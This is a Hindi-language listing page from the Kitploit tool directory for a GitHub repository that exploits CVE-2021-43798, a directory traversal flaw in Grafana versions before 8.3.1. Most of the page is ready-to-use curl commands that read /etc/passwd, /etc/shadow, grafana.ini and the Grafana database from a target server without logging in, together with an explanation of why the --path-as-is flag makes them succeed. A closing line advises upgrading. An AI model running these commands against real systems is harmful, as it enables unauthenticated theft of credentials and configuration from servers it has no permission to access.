Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
Log in
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2021-43798 — CVE-2021-43798 के लिए शोषण, एक Grafana निर्देशिका ट्रैवर्सल भेद्यता, जो तैयार किए गए curl कमांड के माध्यम से अप्रमाणित मनमाना फ़ाइल पढ़ने में सक्षम बनाता है। | Kitploit
उपकरण/GitHubGitHub/malekalthubiany/cve-2021-43798
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubmalekalthubiany/cve-2021-43798

CVE-2021-43798

CVE-2021-43798 के लिए शोषण, एक Grafana निर्देशिका ट्रैवर्सल भेद्यता, जो तैयार किए गए curl कमांड के माध्यम से अप्रमाणित मनमाना फ़ाइल पढ़ने में सक्षम बनाता है।

रिपॉजिटरी देखें
12 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Grafana CVE-2021-43798 शोषण

अवलोकन

यह रिपॉजिटरी CVE-2021-43798 के शोषण को प्रदर्शित करता है, जो Grafana में एक निर्देशिका ट्रैवर्सल भेद्यता है। यह भेद्यता हमलावरों को सर्वर पर मनमानी फ़ाइलें पढ़ने की अनुमति देती है।

CVE विवरण

  • CVE: CVE-2021-43798
  • विवरण: Grafana संस्करण 8.3.1 से पहले के संस्करणों में निर्देशिका ट्रैवर्सल भेद्यता।
  • प्रभाव: अप्रमाणित हमलावरों को सर्वर पर मनमानी फ़ाइलें पढ़ने की अनुमति देता है।

पूर्वावश्यकताएँ

  • Grafana का एक भेद्य संस्करण चल रहा हो (8.3.1 से पहले)
  • लक्षित Grafana इंस्टेंस तक पहुंच

शोषण

curl का उपयोग करना

भेद्यता का मैन्युअल रूप से शोषण करने के लिए, आप संवेदनशील फ़ाइलों को पढ़ने का प्रयास करने के लिए निम्नलिखित curl कमांड में से किसी एक का उपयोग कर सकते हैं:

curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../Users/install.txt"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/passwd"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/grafana/grafana.ini"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../var/lib/grafana/grafana.db"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/hostname"
curl --path-as-is "http://<target_ip>:3000/public/plugins/alertlist/../../../../../../../../../../../etc/shadow"

क्यों --path-as-is?

Grafana CVE-2021-43798 निर्देशिका ट्रैवर्सल भेद्यता के शोषण के संदर्भ में, --path-as-is विकल्प आवश्यक है क्योंकि यह विशेष रूप से तैयार किए गए ट्रैवर्सल अनुक्रमों (../../../../../) को बिना संशोधन के सीधे सर्वर पर भेजने की अनुमति देता है। इससे इच्छित निर्देशिका के बाहर सर्वर पर संवेदनशील फ़ाइलों तक पहुंच हो सकती है।

--path-as-is के बिना, curl पथ को /public/plugins/Users/install.txt जैसी किसी चीज़ में सामान्यीकृत कर सकता है, जो भेद्यता का शोषण नहीं करेगा। --path-as-is का उपयोग करके, सटीक ट्रैवर्सल अनुक्रम संरक्षित रहता है, जिससे शोषण सफल हो जाता है।

दस्तावेज़ीकरण संदर्भ

आप curl दस्तावेज़ीकरण में --path-as-is विकल्प के बारे में अधिक विवरण प्राप्त कर सकते हैं। --path-as-is को समझकर और उपयोग करके, सुरक्षा पेशेवर और शोधकर्ता वेब अनुप्रयोगों में निर्देशिका ट्रैवर्सल भेद्यताओं का प्रभावी ढंग से प्रदर्शन और परीक्षण कर सकते हैं।

शमन

इस भेद्यता को कम करने के लिए, Grafana को संस्करण 8.3.1 या बाद के संस्करण में अपग्रेड करें।

टूल डाउनलोड करें